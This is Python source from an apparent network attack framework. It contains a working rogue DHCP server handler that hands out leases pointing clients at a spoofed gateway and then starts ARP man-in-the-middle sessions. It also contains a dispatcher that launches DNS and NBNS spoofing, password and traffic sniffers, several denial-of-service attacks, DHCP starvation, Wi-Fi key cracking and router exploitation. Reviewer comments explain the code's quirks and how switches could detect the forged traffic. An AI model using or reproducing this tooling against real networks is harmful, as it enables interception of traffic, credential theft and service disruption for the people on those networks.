def pkt_handler(self, pkt) -> None:
    """Sniff callback that answers DHCP DISCOVER/REQUEST frames seen on ``conf.iface``.

    Reads ``self.running``, ``self.curr_ip``, ``self.spoofed_hosts``,
    ``self.net_mask``, ``self.gateway`` and ``self.dump_data``; rebinds
    ``self.curr_ip`` and inserts into ``self.spoofed_hosts``.  A REQUEST
    (option value 3) is answered with a broadcast ACK and then handed to an
    ``ARPSpoof`` session for the assigned address; a DISCOVER (option value 1)
    is answered with a broadcast OFFER.  Nothing is returned.

    Detection note: every frame built here carries the real gateway address
    as IP source but this host's own interface MAC (``hw``) as Ethernet
    source, so a DHCP-snooping or gateway-IP/MAC consistency check on the
    switch or monitoring side sees a mismatch for all of this traffic.
    """
    # is this a DHCP packet!?  (self.running is the on/off switch for the module)
    if self.running and DHCP in pkt:
        for opt in pkt[DHCP].options:
            # if the option is a REQUEST
            # NOTE(review): this matches any tuple option whose second element is 3,
            # not only ('message-type', 3); the option name is never checked.
            if type(opt) is tuple and opt[1] == 3:
                # hw is the local interface MAC; fam is unused here.
                fam,hw = get_if_raw_hwaddr(conf.iface)
                # get the requested address
                # (options may hold the bare string 'end'; 'end'[0] is 'e', so no exception)
                requested_addr = None
                for item in pkt[DHCP].options:
                    if item[0] == 'requested_addr':
                        requested_addr = item[1]
                # if the IP address is the one we've reserved for it, we're golden. Otherwise
                # we need to check if the one they're requesting is free
                if self.curr_ip != requested_addr:
                    if not requested_addr in self.spoofed_hosts:
                        # ip is free, set and use it
                        self.curr_ip = requested_addr
                    else:
                        # ip is in use; generate another
                        # (first address comes from the network part of net_mask, then util.next_ip)
                        if self.curr_ip is None:
                            self.curr_ip = self.net_mask.split('/')[0]
                        else:
                            self.curr_ip = util.next_ip(self.curr_ip)
                # Broadcast ACK: server_id/router/name_server all point at self.gateway,
                # subnet mask and lease time are hard-coded.
                lease = Ether(dst='ff:ff:ff:ff:ff:ff',src=hw)/IP(src=self.gateway,dst='255.255.255.255')/UDP(sport=67,dport=68)
                lease /= BOOTP(op=2,chaddr=mac2str(pkt[Ether].src),yiaddr=self.curr_ip,xid=pkt[BOOTP].xid)
                lease /= DHCP(options=[('message-type','ack'), ('server_id', self.gateway), ('lease_time', 86400), ('subnet_mask', '255.255.255.0'), ('router', self.gateway), ('name_server', self.gateway), 'end'])
                sendp(lease, loop=False)
                if self.dump_data:
                    util.Msg('Handed \'%s\' out to \'%s\''%(self.curr_ip, pkt[Ether].src))
                # Follow-up: an ARPSpoof session between the leased address and the gateway.
                util.debug('Initializing ARP spoofing...')
                tmp = ARPSpoof()
                tmp.to_ip = self.curr_ip
                tmp.from_ip = self.gateway
                if not tmp.initialize_post_spoof() is None:
                    # Only successful sessions are recorded; the address is then treated as taken above.
                    self.spoofed_hosts[self.curr_ip] = tmp
                    util.debug('ARP spoofing successfully configured for \'%s\''%self.curr_ip)
                else:
                    if self.dump_data:
                        # NOTE(review): this message literal was split across two lines in the
                        # listing; a '\n' is assumed here -- confirm against the original file.
                        util.Error('ARP session unsuccessful for %s! \nYou may not be able to get in the middle of them!'%self.curr_ip)
            # discover; send offer
            # NOTE(review): same loose match as above -- any tuple option with value 1.
            elif type(opt) is tuple and opt[1] == 1:
                fam,hw = get_if_raw_hwaddr(conf.iface)
                # Every DISCOVER advances curr_ip, whether or not the offer is ever accepted.
                if self.curr_ip is None:
                    self.curr_ip = self.net_mask.split('/')[0]
                else:
                    self.curr_ip = util.next_ip(self.curr_ip)
                # build and send the DHCP Offer (broadcast, same gateway-as-everything layout as the ACK)
                offer = Ether(dst='ff:ff:ff:ff:ff:ff',src=hw)/IP(src=self.gateway,dst='255.255.255.255')/UDP(sport=67,dport=68)
                offer /= BOOTP(op=2,chaddr=mac2str(pkt[Ether].src),yiaddr=self.curr_ip,xid=pkt[BOOTP].xid)
                offer /= DHCP(options=[('message-type', 'offer'), ('subnet_mask','255.255.255.0'), ('lease_time', 86400), ('name_server', self.gateway), ('router',self.gateway), 'end'])
                sendp(offer, loop=False)
                if self.dump_data:
                    util.Msg('Sent DHCP offer for \'%s\' to \'%s\''%(self.curr_ip, pkt[Ether].src))
def initialize(module):
    """Start the module named by ``module`` and register it in the module-level tables.

    ``module`` is compared against a fixed set of string names.  Handlers that
    produce a session object store it in ``arp_sessions``, ``http_sniffers``,
    ``password_sniffers``, ``traffic_sniffers``, ``static_singles`` or
    ``services``; the rest only call the target's ``initialize``.  The return
    value is inconsistent: only the ``'ap_scan'`` branch returns what its
    initializer returns, and ``'ssh_server'`` returns early (None) when its
    background start fails; every other path returns None.  An unknown name
    is reported through ``Error`` and nothing else happens.
    """
    # NOTE(review): traffic_sniffers is mutated below but is not listed here.
    # Item assignment does not rebind the name, so it still reaches the module
    # global; the declaration is only needed for the names that are rebound.
    global static_singles, arp_sessions, http_sniffers, password_sniffers, services
    debug("Received module start for: %s"%(module))
    if module == 'arp':
        tmp = ARPSpoof()
        to_ip = tmp.initialize()
        if not to_ip is None:
            debug("Storing session for %s"%to_ip)
            arp_sessions[to_ip] = tmp
            del(tmp)
    elif module == 'dns':
        # Pick an existing ARP session interactively; note that this rebinds the
        # ``module`` parameter to the value returned by get_session_input().
        dump_module_sessions('arp')
        (module, number) = get_session_input()
        ip = get_key(module,number)
        if not ip is None:
            arp_sessions[ip].init_dns_spoof()
    elif module == 'dhcp':
        tmp = DHCPSpoof()
        if tmp.initialize():
            static_singles['rogue_dhcp'] = tmp
    elif module == 'ndp':
        ndp_dos.initialize()
    elif module == 'http_sniffer':
        tmp = HTTPSniffer()
        to_ip = tmp.initialize()
        if not to_ip is None:
            debug("Storing sniffer for %s"%to_ip)
            http_sniffers[to_ip] = tmp
    elif module == 'password_sniffer':
        tmp = PasswordSniffer()
        to_ip = tmp.initialize()
        if not to_ip is None:
            debug("Storing sniffer for %s"%to_ip)
            password_sniffers[to_ip] = tmp
    elif module == 'traffic_sniffer':
        tmp = TrafficSniffer()
        to_ip = tmp.initialize()
        if not to_ip is None:
            debug('Storing sniffer for %s'%to_ip)
            traffic_sniffers[to_ip] = tmp
    elif module == 'nestea':
        nestea_dos.initialize()
    elif module == 'land':
        land_dos.initialize()
    elif module == 'smb2':
        smb2_dos.initialize()
    elif module == 'net_map':
        static_singles['netscan'] = NetMap()
        static_singles['netscan'].initialize()
    elif module == 'service_scan':
        service_scan.initialize()
    elif module == 'dhcp_starv':
        dhcp_starvation.initialize()
    elif module == 'ap_scan':
        # The only branch that propagates the initializer's return value.
        return ap_scan.initialize()
    elif module == 'wep_crack':
        ap_crack.initialize('wep')
    elif module == 'wpa_crack':
        ap_crack.initialize('wpa')
    elif module == 'wps_crack':
        ap_crack.initialize('wps')
    elif module == 'router_pwn':
        router_pwn.initialize()
    elif module == 'tcp_syn':
        tcp_syn.initialize()
    elif module == 'nbns':
        tmp = NBNSSpoof()
        if tmp.initialize():
            static_singles['nbnspoof'] = tmp
    elif module == 'ftp_server':
        # Background services are stored unconditionally here and for http/smb;
        # only ssh and access_point check the result of initialize_bg().
        tmp = FTPService()
        tmp.initialize_bg()
        services['ftp'] = tmp
    elif module == 'http_server':
        tmp = HTTPService()
        tmp.initialize_bg()
        services['http'] = tmp
    elif module == 'ssh_server':
        tmp = SSHService()
        if not tmp.initialize_bg():
            # Failed start: leave services untouched and return None.
            return
        services['ssh'] = tmp
    elif module == 'access_point':
        tmp = APService()
        if tmp.initialize_bg():
            services['wireless ap'] = tmp
    elif module == 'smb':
        tmp = SMBService()
        tmp.initialize_bg()
        services['smb'] = tmp
    else:
        Error('Module \'%s\' does not exist.'%module)